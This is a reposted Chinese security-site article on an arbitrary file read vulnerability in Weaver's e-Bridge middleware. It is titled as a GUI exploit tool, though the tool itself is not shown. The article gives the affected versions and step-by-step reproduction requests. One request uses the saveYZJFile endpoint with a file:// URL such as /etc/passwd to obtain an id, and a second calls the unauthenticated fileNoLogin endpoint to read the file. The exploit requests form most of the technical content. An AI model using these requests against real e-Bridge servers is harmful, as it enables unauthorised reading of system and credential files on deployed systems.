记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

泛微云桥e-Bridge任意文件读取漏洞利用工具(GUI版)

2020-09-26 13:13

漏洞描述

泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。

影响版本

该漏洞几乎影响2018-2019全版本。

漏洞复现

第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串

第二步:通过id值获取文件内容(/file/fileNoLogin/id)

1、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,发现返回提示不存在文件或目录,通过linux对大小写敏感,判断目标使用了linux系统

泛微云桥e-Bridge任意文件读取漏洞利用工具(GUI版)-极度安全

2、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt,发现返回包中带有id

泛微云桥e-Bridge任意文件读取漏洞利用工具(GUI版)-极度安全

3、通过查看文件接口访问 /file/fileNoLogin/id

泛微云桥e-Bridge任意文件读取漏洞利用工具(GUI版)-极度安全


知识来源: https://www.secvery.com/1757.html

阅读:59201 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“泛微云桥e-Bridge任意文件读取漏洞利用工具(GUI版)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云

本页关键词